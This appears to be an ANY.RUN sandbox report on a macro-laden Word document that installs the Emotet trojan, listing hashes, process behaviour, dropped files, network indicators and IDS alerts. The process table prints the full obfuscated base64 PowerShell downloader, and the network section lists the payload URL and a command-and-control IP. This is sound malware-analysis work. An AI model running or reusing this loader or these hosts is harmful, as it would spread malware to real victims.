analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

5f9566138e350135ffa42ea776ef56c5c73488d0b9f7604adf3a52e679dc8822.doc

Full analysis: https://app.any.run/tasks/4b539b5c-1454-4ff7-a01f-ea3d3e7c552d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 14, 2019, 13:14:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 06:50:00 2019, Last Saved Time/Date: Thu Mar 14 06:50:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0
MD5:

0ACCA94A92406C2E2AA27E2849EC4AFE

SHA1:

A050AF276291D1F48CC9FCCAE6737613E67A547B

SHA256:

5F9566138E350135FFA42EA776EF56C5C73488D0B9F7604ADF3A52E679DC8822

SSDEEP:

6144:J77HUUUUUUUUUUUUUUUUUUUT52V5VthAdIl8wxoDSJEqpyukOtHL3ag51:J77HUUUUUUUUUUUUUUUUUUUTCJhAOGux

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • NfPp.exe (PID: 3876)
      • wabmetagen.exe (PID: 3264)
      • NfPp.exe (PID: 2356)
      • 947.exe (PID: 2236)
      • wabmetagen.exe (PID: 2540)
      • 947.exe (PID: 3324)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3264)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2540)
    • Connects to CnC server

      • wabmetagen.exe (PID: 3264)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3400)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3264)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3400)
    • Starts itself from another location

      • 947.exe (PID: 3324)
    • Application launched itself

      • wabmetagen.exe (PID: 2540)
      • NfPp.exe (PID: 3876)
      • 947.exe (PID: 2236)
    • Executable content was dropped or overwritten

      • wabmetagen.exe (PID: 3264)
      • powershell.exe (PID: 3400)
      • 947.exe (PID: 3324)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3436)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3436)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 13
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 12
Words: 2
Pages: 1
ModifyDate: 2019:03:14 06:50:00
CreateDate: 2019:03:14 06:50:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start winword.exe no specs powershell.exe 947.exe no specs 947.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe nfpp.exe no specs nfpp.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3436"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\5f9566138e350135ffa42ea776ef56c5c73488d0b9f7604adf3a52e679dc8822.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3400powershell -e JgAoACAAJABFAG4AdgA6AEMATwBtAHMAcABFAEMAWwA0ACwAMgA2ACwAMgA1AF0ALQBqAG8AaQBuACcAJwApACgAbgBlAHcALQBPAEIASgBlAEMAdAAgAHMAeQBzAHQARQBNAC4AaQBvAC4AYwBvAG0AUABSAGUAUwBTAGkATwBuAC4ARABFAEYATABBAHQARQBzAHQAUgBlAGEAbQAoAFsAaQBvAC4AbQBlAE0AbwByAFkAcwB0AHIAZQBBAE0AXQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAFIATwBNAEIAYQBzAEUANgA0AHMAVAByAGkATgBnACgAKAAnAFYAWgBGACcAKwAnAGgAYQA5ACcAKwAnAHMAdwAnACsAJwBGACcAKwAnAEUAWAAvAGkAagAnACsAJwA4ACcAKwAnAFkAJwArACcAbABKACcAKwAnAEIAWgBxAGoATQBuAGIAVwAnACsAJwBvAE0AZgAnACsAJwBiACcAKwAnAFoAJwArACcAcAAnACsAJwBDAEcAeAAnACsAJwBqAHAAcQBnAHoAWQAnACsAJwBSACcAKwAnAEIAJwArACcAcwBXAFkAJwArACcAbAAnACsAJwBkAE8ANQBJAGIAeQAnACsAJwBYAFcAVABrACcAKwAnAFAAOAAnACsAJwArAFoAJwArACcAUwBUAHQAJwArACcAcABrADgAUwAnACsAJwBuACcAKwAnAEgAZgBmACcAKwAnADUAJwArACcAYwBnAE8AJwArACcARQAnACsAJwAxACcAKwAnAGoAUgBOAEkAMABEACcAKwAnADkAQwAnACsAJwAxAEoAVgAnACsAJwBqACcAKwAnAEMAbgB5AEwAZQAnACsAJwBmACcAKwAnAEkAWQBWAFEAJwArACcAeQBrAEQAdwAnACsAJwAzAHAASAA1AEMAMgBmACcAKwAnAGEAKwAnACsAJwBzAEUAMQAvACcAKwAnAHMAWAB6ACcAKwAnAHEAJwArACcASwBtADQAMAAnACsAJwBMADcAOQAnACsAJwBIAFoAWQAnACsAJwBRAG0AJwArACcANQBsAFMANgAvAGEAZQBFAEwARwBwAHEAMABLAFYAcwAnACsAJwBzAFYATQAnACsAJwBiACcAKwAnAGsAbgBmAE8AawB3ACcAKwAnAEsAYgBVAEQAeQByAEwAZAAzADUATwBGACcAKwAnAEMATQAnACsAJwBiAEgATwB0AGwAVwB6ADcAJwArACcAMwAnACsAJwBuAFcAJwArACcANgBQAEkAJwArACcAdgB5ACcAKwAnAHAAUQBpAGIAZgAnACsAJwBkAEIAdQBKAE0AJwArACcAWgBuAGsAJwArACcANgAnACsAJwB3ACcAKwAnAGQANAAnACsAJwB2AEgAcgAnACsAJwB2AHQAdgAnACsAJwBUACcAKwAnAHQAYwAyAE0AaQBzAFUAVQBWADAAcABQAHUAJwArACcAagAnACsAJwBpACcAKwAnAHMAQgBjAGMAQwAnACsAJwA2ADcAJwArACcASgAnACsAJwB5AHkARQByAGMANgBjAFYAQgB6AFoAVgBqAHQAJwArACcAdwBYACcAKwAnAFcAdQBXAHYAMwBTACcAKwAnAHMAWgBaADEATwBZACcAKwAnAGYAJwArACcASQBhADcAZAAnACsAJwAzAGoAcwBZAGYAJwArACcAZAAnACsAJwBtAGgAcwBkAGYAJwArACcAcAArAGYAJwArACcAMABTAHIAQwBtACcAKwAnAEsANwBnAGkAJwArACcAMwAnACsAJwBzAC8ATwAnACsAJwBJAHcAJwArACcAZwAnACsAJwAvACcAKwAnAHQAVQAyAGwAQgArACcAKwAnAGcAQgBEAFgAJwArACcAMgBiAHoAVAAwADMAJwArACcAWAAnACsAJwBOAEUAJwArACcAawBRAEEAJwArACcAcABpAGcARQBpAEMAJwArACcARQAnACsAJwBhAE4AaQBvAEEAbQAxAEEAZwAnACsAJwB2AE4AdgBGAHYAegBmAHUAegBaAEUAJwArACcAcAAnACsAJwBJACcAKwAnAGwARABkAEEAQgBrAGoAQwBGADEAUgBtAEsARwBYAGgAJwArACcASgBGAEEAJwArACcAWQAyAEYAMgAvADMAbgBlAEsAJwArACcANwBkAGkAJwArACcAZgAnACsAJwBYAFYAYwBOAEgAJwArACcANgBEAGMAYQBYAFMAJwArACcASgBHACcAKwAnAEMAUAAnACsAJwBOADMAJwArACcAagAnACsAJwB2ACcAKwAnAHkAMQAnACsAJwAzACcAKwAnAFAARwAnACsAJwBNAGwAUQBQADcAeQBTAGkAUAAnACsAJwB3AEsAJwArACcAcQBFACcAKwAnAGQAJwArACcAWABFADcAUABPAHIAZAAvAG4AagA5AEMAaAAnACsAJwB6AEwAWABwAHcAVgBQACcAKwAnAEoAcQAnACsAJwBnAEsALwAzACcAKwAnAEYAdQB1ACcAKwAnADQAeQAnACsAJwBmAGEAJwArACcAcwBVACcAKwAnAHEAJwArACcAQgBjAEcASwBIAE0AJwArACcAVABnACcAKwAnAE4AcgAwAFcASwAnACsAJwB5ACcAKwAnAHQAdwBXACcAKwAnAEQATwB0AGIAUABRAGYAUAAnACsAJwB0AEoANABvAGEATABqAFMANAAnACsAJwB0AFoAOAAnACsAJwBNAHQANwAnACsAJwA4AGEAYwBvAFgAVgBjAGkAJwArACcARABkAFoAOAAvACcAKwAnADkAQgAzADIANAAnACsAJwBqACcAKwAnAGsAJwArACcASABVAGMAQgBhAGgAaQBkAEUAbAAnACsAJwBEACcAKwAnADUATwBlAG0AYQArADIAZgBUAGkAegBUAHIAJwArACcARAB5AGUAVAB2AFkAJwArACcAYwBRAGcAJwArACcAQgBqAHEASQBOADMAYwA2AEYAbQAnACsAJwA2AFIAJwArACcAOAA9ACcAKQAgACkALAAgAFsASQBvAC4AQwBvAE0AUABSAGUAUwBTAGkATwBOAC4AYwBPAE0AUAByAGUAcwBzAGkATwBuAG0AbwBEAEUAXQA6ADoAZABlAEMAbwBtAHAAcgBlAFMAUwAgACkAfAAgAEYATwByAGUAYQBjAGgAIAB7AG4AZQB3AC0ATwBCAEoAZQBDAHQAIABzAHkAUwBUAEUAbQAuAEkATwAuAFMAVAByAGUAYQBNAHIAZQBhAEQAZQByACgAJABfACAALABbAFQARQB4AFQALgBFAG4AYwBvAEQAaQBOAEcAXQA6ADoAYQBzAEMASQBJACAAKQB9ACkALgBSAEUAYQBkAHQAbwBlAG4AZAAoACAAKQAgAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2236"C:\Users\admin\947.exe" C:\Users\admin\947.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3324"C:\Users\admin\947.exe"C:\Users\admin\947.exe
947.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2540"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
947.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3264"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3876"C:\Users\admin\AppData\Local\wabmetagen\NfPp.exe"C:\Users\admin\AppData\Local\wabmetagen\NfPp.exewabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2356"C:\Users\admin\AppData\Local\wabmetagen\NfPp.exe"C:\Users\admin\AppData\Local\wabmetagen\NfPp.exeNfPp.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 675
Read events
1 261
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3436WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8505.tmp.cvr
MD5:
SHA256:
3400powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\97SWIUQPCH15S66IPXSO.temp
MD5:
SHA256:
3400powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199282.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3436WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5A1AC50DEFFE3ADEEC3C1C6B7CE515EE
SHA256:A05624EE45E532E271EC27383128A22E6F3E19C02D9EF83102D437F8C9A16589
3264wabmetagen.exeC:\Users\admin\AppData\Local\wabmetagen\NfPp.exeexecutable
MD5:513B6A3E92DB13E2DB8AAE4E4D4E7A27
SHA256:A23EC414050101D59D86882AF4B08352B69127CD2CEC22B9037EE2D5468293C5
3400powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3436WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$9566138e350135ffa42ea776ef56c5c73488d0b9f7604adf3a52e679dc8822.docpgc
MD5:FE778C0909F82C98B0C756D5BC9D3C61
SHA256:0A070902A35D61D84744A21AC6660F0366F5F8E55BBEB1EBCB04F5D25D9D358D
3400powershell.exeC:\Users\admin\947.exeexecutable
MD5:45A89A4E0434F8092EB046E8307DC6A6
SHA256:F2DCD182C3A281EE4B0026F6267FB1FAFD27AE3F656941464363E4D1C0D68A28
3324947.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:45A89A4E0434F8092EB046E8307DC6A6
SHA256:F2DCD182C3A281EE4B0026F6267FB1FAFD27AE3F656941464363E4D1C0D68A28
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3400
powershell.exe
GET
200
103.57.209.252:80
http://ngkidshop.com/wp-content/Vtm8/
VN
executable
354 Kb
malicious
3264
wabmetagen.exe
GET
200
82.78.228.57:443
http://82.78.228.57:443/
RO
binary
135 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3264
wabmetagen.exe
82.78.228.57:443
RCS & RDS
RO
malicious
3400
powershell.exe
103.57.209.252:80
ngkidshop.com
VN
suspicious

DNS requests

Domain
IP
Reputation
ngkidshop.com
  • 103.57.209.252
malicious

Threats

PID
Process
Class
Message
3400
powershell.exe
Misc Attack
ET COMPROMISED Known Compromised or Hostile Host Traffic group 1
3400
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3400
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3400
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3400
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
3264
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info